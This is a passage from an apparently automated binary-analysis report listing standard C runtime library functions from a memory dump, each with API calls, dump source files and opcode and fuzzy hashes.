                                                                          • Opcode ID: 406d8c37374ac956a1b71d3aa3be93bae268f7bd6938fa67a692804ffb83ac6b
                                                                          • Instruction ID: ce093ac5f4aa57f73b2ed7172ca9652045a35de9feddb8e3d8da715d371103a8
                                                                          • Opcode Fuzzy Hash: 406d8c37374ac956a1b71d3aa3be93bae268f7bd6938fa67a692804ffb83ac6b
                                                                          • Instruction Fuzzy Hash: 90D012A61443C27ECA10BB97FD59B087B5DB7A7B2CF83062CC22825718FBB40008C712
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013E6FBC, Relevance: 9.1, APIs: 6, Instructions: 92COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,013E70D1,00000000,00000001,00000000), ref: 013E7006
                                                                          • _malloc.LIBCMT ref: 013E703B
                                                                          • _memset.LIBCMT ref: 013E705B
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,00000000,00000001,?,7FFFFFFF), ref: 013E7070
                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,00000000), ref: 013E707E
                                                                          • __freea.LIBCMT ref: 013E7088
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide$StringType__freea_malloc_memset
                                                                          • String ID:
                                                                          • API String ID: 525495869-0
                                                                          • Opcode ID: 0e00bc5010a42888260a015744e2a623cdb73441f6ddb3a98d21b905524dc460
                                                                          • Instruction ID: ab2c672672ded1e9c17cea0269f3677676a3894bec8b48b13d37aa5d5b89f49b
                                                                          • Opcode Fuzzy Hash: 0e00bc5010a42888260a015744e2a623cdb73441f6ddb3a98d21b905524dc460
                                                                          • Instruction Fuzzy Hash: 23316DB660021AAFEF209F68DC84DAF7FEDEB48358F104425F905D7290E675DD548BA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013DE0AB, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __CreateFrameInfo.LIBCMT ref: 013DE0D3
                                                                            • Part of subcall function 013DD29C: __getptd.LIBCMT ref: 013DD2AA
                                                                            • Part of subcall function 013DD29C: __getptd.LIBCMT ref: 013DD2B8
                                                                          • __getptd.LIBCMT ref: 013DE0DD
                                                                            • Part of subcall function 013E355F: __getptd_noexit.LIBCMT ref: 013E3562
                                                                            • Part of subcall function 013E355F: __amsg_exit.LIBCMT ref: 013E356F
                                                                          • __getptd.LIBCMT ref: 013DE0EB
                                                                          • __getptd.LIBCMT ref: 013DE0F9
                                                                          • __getptd.LIBCMT ref: 013DE104
                                                                          • _CallCatchBlock2.LIBCMT ref: 013DE12A
                                                                            • Part of subcall function 013DD341: __CallSettingFrame@12.LIBCMT ref: 013DD38D
                                                                            • Part of subcall function 013DE1D1: __getptd.LIBCMT ref: 013DE1E0
                                                                            • Part of subcall function 013DE1D1: __getptd.LIBCMT ref: 013DE1EE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                          • String ID:
                                                                          • API String ID: 1602911419-0
                                                                          • Opcode ID: b67b7291cbf6d16e800b2f39cbc69358aee36cf14f1bd73bb9b4d1a9b0c2b235
                                                                          • Instruction ID: 60ed0441722683e8897775f629066c638c64d2c034ce87fff7c961b18f954683
                                                                          • Opcode Fuzzy Hash: b67b7291cbf6d16e800b2f39cbc69358aee36cf14f1bd73bb9b4d1a9b0c2b235
                                                                          • Instruction Fuzzy Hash: 1C119971D0030AEFDF04EFA8D849AAD7BF1FF14318F108069E814AB291DB7899159B50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013E2BB5, Relevance: 9.0, APIs: 6, Instructions: 47COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __getptd.LIBCMT ref: 013E2BC1
                                                                            • Part of subcall function 013E355F: __getptd_noexit.LIBCMT ref: 013E3562
                                                                            • Part of subcall function 013E355F: __amsg_exit.LIBCMT ref: 013E356F
                                                                          • __amsg_exit.LIBCMT ref: 013E2BE1
                                                                          • __lock.LIBCMT ref: 013E2BF1
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 013E2C0E
                                                                          • _free.LIBCMT ref: 013E2C21
                                                                          • InterlockedIncrement.KERNEL32(03072C38), ref: 013E2C39
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                          • String ID:
                                                                          • API String ID: 3470314060-0
                                                                          • Opcode ID: e804b6ac18f33819db5752f2b73047adb880cd474e65932de6a31b4acacb60dc
                                                                          • Instruction ID: 296db6ea990dd1e8a043b41a82a8286cc1ca00eb20de737179a9cb364b78f4b7
                                                                          • Opcode Fuzzy Hash: e804b6ac18f33819db5752f2b73047adb880cd474e65932de6a31b4acacb60dc
                                                                          • Instruction Fuzzy Hash: 1B016D32900736EBDF25AFAD954875EBBE8BF04729F014109E818A72C4DB74A991CBD1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013DE458, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___BuildCatchObject.LIBCMT ref: 013DE46B
                                                                            • Part of subcall function 013DE3C6: ___BuildCatchObjectHelper.LIBCMT ref: 013DE3FC
                                                                          • _UnwindNestedFrames.LIBCMT ref: 013DE482
                                                                          • ___FrameUnwindToState.LIBCMT ref: 013DE490
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                          • String ID: csm$csm
                                                                          • API String ID: 2163707966-3733052814
                                                                          • Opcode ID: 6ef5178bb4ac5707e93fa6ab3a2e7c2d15f0c831d0c792841216fa3497f2186a
                                                                          • Instruction ID: b84083993569747ac2fa7ae85558d41ac206529f4deda5733d793d666df58917
                                                                          • Opcode Fuzzy Hash: 6ef5178bb4ac5707e93fa6ab3a2e7c2d15f0c831d0c792841216fa3497f2186a
                                                                          • Instruction Fuzzy Hash: 0E01F63240011ABBDF126F59EC44EEA7F6AEF18358F008024FD1829160DB32D9B1EBE5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013DDDE8, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __getptd.LIBCMT ref: 013DDE09
                                                                            • Part of subcall function 013E355F: __getptd_noexit.LIBCMT ref: 013E3562
                                                                            • Part of subcall function 013E355F: __amsg_exit.LIBCMT ref: 013E356F
                                                                          • __getptd.LIBCMT ref: 013DDE1A
                                                                          • __getptd.LIBCMT ref: 013DDE28
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 803148776-2084237596
                                                                          • Opcode ID: 71d43109ea926286651c4f4fe2ef787f4e5b4d1edbf0102c4b0593ab4ed425ea
                                                                          • Instruction ID: 84a393ab50b41790e3df6849d2fa31baad63fa72315690d52ae29307dca1f0cb
                                                                          • Opcode Fuzzy Hash: 71d43109ea926286651c4f4fe2ef787f4e5b4d1edbf0102c4b0593ab4ed425ea
                                                                          • Instruction Fuzzy Hash: 82E01A3661021ADFEB20ABACD04DB7837D4BFA821DF1914A1E50CCB2F3C778E4658952
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013DBB85, Relevance: 7.7, APIs: 5, Instructions: 160COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
                                                                          • String ID:
                                                                          • API String ID: 4048096073-0
                                                                          • Opcode ID: 190e1f75e4032065638f707c2b039ffa44cbd0990e8cd8773a3fee2eaaede4e3
                                                                          • Instruction ID: 77806aecef224715acc84be7792e38b3c4b0212c9ccbd227d49c63a09e2b4e78
                                                                          • Opcode Fuzzy Hash: 190e1f75e4032065638f707c2b039ffa44cbd0990e8cd8773a3fee2eaaede4e3
                                                                          • Instruction Fuzzy Hash: 9451F732E00709DBDF258FADE84469DFBB4BF42328F168269E920571D8D7709A50CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013E7165, Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _malloc.LIBCMT ref: 013E7173
                                                                            • Part of subcall function 013DFE23: __FF_MSGBANNER.LIBCMT ref: 013DFE3C
                                                                            • Part of subcall function 013DFE23: __NMSG_WRITE.LIBCMT ref: 013DFE43
                                                                            • Part of subcall function 013DFE23: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,013DF0BF,?,00000001,?,?,013E199B,00000018,013F8BB0,0000000C,013E1A2B), ref: 013DFE68
                                                                          • _free.LIBCMT ref: 013E7186
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: AllocateHeap_free_malloc
                                                                          • String ID:
                                                                          • API String ID: 1020059152-0
                                                                          • Opcode ID: 9b9beb316989c055166a1d21a9d2a9e0bfbfba6cda8b37fb85fd57f6b0f1dfed
                                                                          • Instruction ID: ebe11c7fb34c1dc1fbfc4ac98dd23bba4c358d64fbe860aac9015bf31e226bcd
                                                                          • Opcode Fuzzy Hash: 9b9beb316989c055166a1d21a9d2a9e0bfbfba6cda8b37fb85fd57f6b0f1dfed
                                                                          • Instruction Fuzzy Hash: 6411A732540736ABCB362B7CA90CA593BDE9F503ADF108529F949AB2D0DA74C8518FD0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013E3336, Relevance: 7.5, APIs: 5, Instructions: 34COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __getptd.LIBCMT ref: 013E3342
                                                                            • Part of subcall function 013E355F: __getptd_noexit.LIBCMT ref: 013E3562
                                                                            • Part of subcall function 013E355F: __amsg_exit.LIBCMT ref: 013E356F
                                                                          • __getptd.LIBCMT ref: 013E3359
                                                                          • __amsg_exit.LIBCMT ref: 013E3367
                                                                          • __lock.LIBCMT ref: 013E3377
                                                                          • __updatetlocinfoEx_nolock.LIBCMT ref: 013E338B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                          • String ID:
                                                                          • API String ID: 938513278-0
                                                                          • Opcode ID: 6a3a4a5d11a22c603a845e7fa2055dcbf29750c6416152fdfd133a0ce3bd1fed
                                                                          • Instruction ID: ca7a5cf21e7b4838e6086bd7d6ecc62c8663a169eb57d754f99e356bf8267a2c
                                                                          • Opcode Fuzzy Hash: 6a3a4a5d11a22c603a845e7fa2055dcbf29750c6416152fdfd133a0ce3bd1fed
                                                                          • Instruction Fuzzy Hash: 01F06D32A44726EBEA25BBAC9409B1D76E17F10728F10020DE164AB3C1CFA455408A55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013DA100, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 130COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: Fputc$H_prolog3_
                                                                          • String ID:
                                                                          • API String ID: 2569218679-3916222277
                                                                          • Opcode ID: f83ca5e99b57825312f11b1f97f9a3df24b598f0f283c5e0ccde556f87b5e086
                                                                          • Instruction ID: 13b78256781cef9f9e4838387c21901f9e9cdc3c76ae547d96f5e8a5f0197af2
                                                                          • Opcode Fuzzy Hash: f83ca5e99b57825312f11b1f97f9a3df24b598f0f283c5e0ccde556f87b5e086
                                                                          • Instruction Fuzzy Hash: 1641B13390020ADFCF21CBB8EA80AEEB7B5BF59358F14851AE552A7681D771A944CB50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013DBE2A, Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                          • String ID:
                                                                          • API String ID: 2782032738-0
                                                                          • Opcode ID: cce9a3df3a78eba706834834034b9f3b0b10ebceaada98a9f739dfddc599695a
                                                                          • Instruction ID: a5d18aa750a947e89a007f6ebeed31129ce4e44fea1ac51cd4a8e2f7f30ef324
                                                                          • Opcode Fuzzy Hash: cce9a3df3a78eba706834834034b9f3b0b10ebceaada98a9f739dfddc599695a
                                                                          • Instruction Fuzzy Hash: 68412833A003099BDB248F6DF84469EFBF9AF82368F16456CE51997184D771DA44CF40
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013EA797, Relevance: 6.1, APIs: 4, Instructions: 103COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 013EA7CB
                                                                          • __isleadbyte_l.LIBCMT ref: 013EA7FE
                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000000,?,00000000,00000000,?,?,?,?,00000000,00000000), ref: 013EA82F
                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000000,00000001,00000000,00000000,?,?,?,?,00000000,00000000), ref: 013EA89D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                          • String ID:
                                                                          • API String ID: 3058430110-0
                                                                          • Opcode ID: b093b486cc0e01798a3ddefb5f424ff299af45b52d472d7874bd8f3148f43a6c
                                                                          • Instruction ID: 3daf3207e8475d62db35dfe66393744661e1ced64e2a6bd2b0bc1df5120a9548
                                                                          • Opcode Fuzzy Hash: b093b486cc0e01798a3ddefb5f424ff299af45b52d472d7874bd8f3148f43a6c
                                                                          • Instruction Fuzzy Hash: DE31B331A4036AEFDB21DFA8C8889B93FF5BF01318F148569E5629B1D1E730D941CB50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013E255A, Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _free$__cenvarg__dospawn__getptd_noexit
                                                                          • String ID:
                                                                          • API String ID: 1016086714-0
                                                                          • Opcode ID: 42b6896517d5d2aaff90327413600ae6f7d47c05738bd5c145b926e31e2b4ee3
                                                                          • Instruction ID: 1b45ad96bdde1d17b9ecaa42acafb5969dc1d3e27b17c61341b5aa118a41a835
                                                                          • Opcode Fuzzy Hash: 42b6896517d5d2aaff90327413600ae6f7d47c05738bd5c145b926e31e2b4ee3
                                                                          • Instruction Fuzzy Hash: A601FB72800219BBCF166FA8DD099DE7EBAEF14368F004654F925611E0E7B28A65DB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013DCEF1, Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _malloc.LIBCMT ref: 013DCF0B
                                                                            • Part of subcall function 013DFE23: __FF_MSGBANNER.LIBCMT ref: 013DFE3C
                                                                            • Part of subcall function 013DFE23: __NMSG_WRITE.LIBCMT ref: 013DFE43
                                                                            • Part of subcall function 013DFE23: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,013DF0BF,?,00000001,?,?,013E199B,00000018,013F8BB0,0000000C,013E1A2B), ref: 013DFE68
                                                                          • std::exception::exception.LIBCMT ref: 013DCF40
                                                                          • std::exception::exception.LIBCMT ref: 013DCF5A
                                                                          • __CxxThrowException@8.LIBCMT ref: 013DCF6B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                          • String ID:
                                                                          • API String ID: 615853336-0
                                                                          • Opcode ID: 0777fd21391657340710aa7efd5ce4debb10083f187cbb6991bae034c45738b4
                                                                          • Instruction ID: 9d865382a73bfbd6e5312ec9489f199ecdae4c124748d568202c34f6b4f05a36
                                                                          • Opcode Fuzzy Hash: 0777fd21391657340710aa7efd5ce4debb10083f187cbb6991bae034c45738b4
                                                                          • Instruction Fuzzy Hash: 5FF0F43A51031AAADB14EB9CE808AED3ABCAB6061CF04019DD508A61D1DFB0EB49C740
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D8E0F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 013D8E2B
                                                                            • Part of subcall function 013DA4EF: std::exception::exception.LIBCMT ref: 013DA504
                                                                            • Part of subcall function 013DA4EF: __CxxThrowException@8.LIBCMT ref: 013DA519
                                                                            • Part of subcall function 013DA4EF: std::exception::exception.LIBCMT ref: 013DA52A
                                                                            • Part of subcall function 013D8DA9: std::_Xinvalid_argument.LIBCPMT ref: 013D8DBC
                                                                          • _memmove.LIBCMT ref: 013D8E86
                                                                          Strings
                                                                          • invalid string position, xrefs: 013D8E26
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                          • String ID: invalid string position
                                                                          • API String ID: 3404309857-1799206989
                                                                          • Opcode ID: fc02fb53b7a1147fed9810f5712d68e31a288e2ca03ab58e812302ac8f9e9fe2
                                                                          • Instruction ID: e3423840abebe2808c66832eee339133c15b456056f0e951643d9a39900400fd
                                                                          • Opcode Fuzzy Hash: fc02fb53b7a1147fed9810f5712d68e31a288e2ca03ab58e812302ac8f9e9fe2
                                                                          • Instruction Fuzzy Hash: B011C833304211ABCB249F4CEC40A6AB7A9EB91628B14099DF55A87281C771FD408B95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D8BFC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 013D8C14
                                                                            • Part of subcall function 013DA4EF: std::exception::exception.LIBCMT ref: 013DA504
                                                                            • Part of subcall function 013DA4EF: __CxxThrowException@8.LIBCMT ref: 013DA519
                                                                            • Part of subcall function 013DA4EF: std::exception::exception.LIBCMT ref: 013DA52A
                                                                          • _memmove.LIBCMT ref: 013D8C4D
                                                                          Strings
                                                                          • invalid string position, xrefs: 013D8C0F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                          • String ID: invalid string position
                                                                          • API String ID: 1785806476-1799206989
                                                                          • Opcode ID: a8b7bf610efeb3ad3119923c01e99f95d7c46676c2fd6f09da2715ea808f95a2
                                                                          • Instruction ID: 05e3147ae72fa32f2fe6f44ee99368120a6fd7e6c6b8acb085a123cd0bb4baf5
                                                                          • Opcode Fuzzy Hash: a8b7bf610efeb3ad3119923c01e99f95d7c46676c2fd6f09da2715ea808f95a2
                                                                          • Instruction Fuzzy Hash: 8A01B573311355DBDB249E6CE8C482BF7AAEB80618724497DD58287741DB70FC46C3A4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013DE1D1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 013DD2EF: __getptd.LIBCMT ref: 013DD2F5
                                                                            • Part of subcall function 013DD2EF: __getptd.LIBCMT ref: 013DD305
                                                                          • __getptd.LIBCMT ref: 013DE1E0
                                                                            • Part of subcall function 013E355F: __getptd_noexit.LIBCMT ref: 013E3562
                                                                            • Part of subcall function 013E355F: __amsg_exit.LIBCMT ref: 013E356F
                                                                          • __getptd.LIBCMT ref: 013DE1EE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                          • String ID: csm
                                                                          • API String ID: 803148776-1018135373
